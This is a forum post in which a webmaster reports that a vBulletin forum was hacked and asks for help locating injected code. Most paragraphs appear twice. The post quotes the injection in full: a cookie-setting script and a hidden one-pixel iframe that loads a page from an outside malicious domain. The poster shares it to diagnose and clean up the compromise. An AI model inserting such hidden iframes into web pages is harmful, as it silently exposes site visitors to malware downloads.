My site got hacked last night or early this morning, and I'm having a heck of a time figuring out how to address the issue.
I got warnings emailed to me from Google, and if you navigate to groundtradesxchange-dot-com, you'll likely get a big warning page before you'll need to agree to bypass to see any pages.
But the injected code seems really tricky. I've actually only been able to spot it once via view source, and it seems once I see it on a page, I refresh that page and it's gone.
Anyway - the injected code I found appeared before the html doctype declaration, and was the following:
What I don't understand is, where do I need to be looking to find where this script is residing? I've searched within the templates, languages and phrases to find even a piece of this code, and have come up empty, which makes me wonder if it's a server thing and not a vbulletin thing. And if that's the case, what should be my next step?
I run other forums on the same server, and they appear unaffected. Possibly related, the unaffected forums are running v 3.8.1, and the affected forum is running v 3.6.8 pl2. (I know, I know. Upgrade. I will, once this is cleared up.)
Any ideas where I should be looking?
This injected code seems to come and go randomly, so I'm having a hard time pinning it down. The url where I was able to find it is here: http://www.groundtradesxchange.com/f...html#post70329 but like I said, it only appeared once. But it shows up enough that Google has posted a warning in their search results and most current browsers post a warning before letting you go through to the page.
I got warnings emailed to me from Google, and if you navigate to groundtradesxchange-dot-com, you'll likely get a big warning page before you'll need to agree to bypass to see any pages.
But the injected code seems really tricky. I've actually only been able to spot it once via view source, and it seems once I see it on a page, I refresh that page and it's gone.
Anyway - the injected code I found appeared before the html doctype declaration, and was the following:
Code:
<script> function SetCookie(cookieName,cookieContent){ var cookiePath = '/'; var expDate=new Date(); expDate.setTime(expDate.getTime()+372800000) ; var expires=expDate.toGMTString(); document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires; } SetCookie("pillaala", "ldladad"); </script> <iframe name="4" width="1" height="1" scrolling="no" frameborder="no" marginwidth="0" marginheight="0" src="http://www.fratocseo.co.cc/greb.php"></iframe>
I run other forums on the same server, and they appear unaffected. Possibly related, the unaffected forums are running v 3.8.1, and the affected forum is running v 3.6.8 pl2. (I know, I know. Upgrade. I will, once this is cleared up.)
Any ideas where I should be looking?
This injected code seems to come and go randomly, so I'm having a hard time pinning it down. The url where I was able to find it is here: http://www.groundtradesxchange.com/f...html#post70329 but like I said, it only appeared once. But it shows up enough that Google has posted a warning in their search results and most current browsers post a warning before letting you go through to the page.
Comment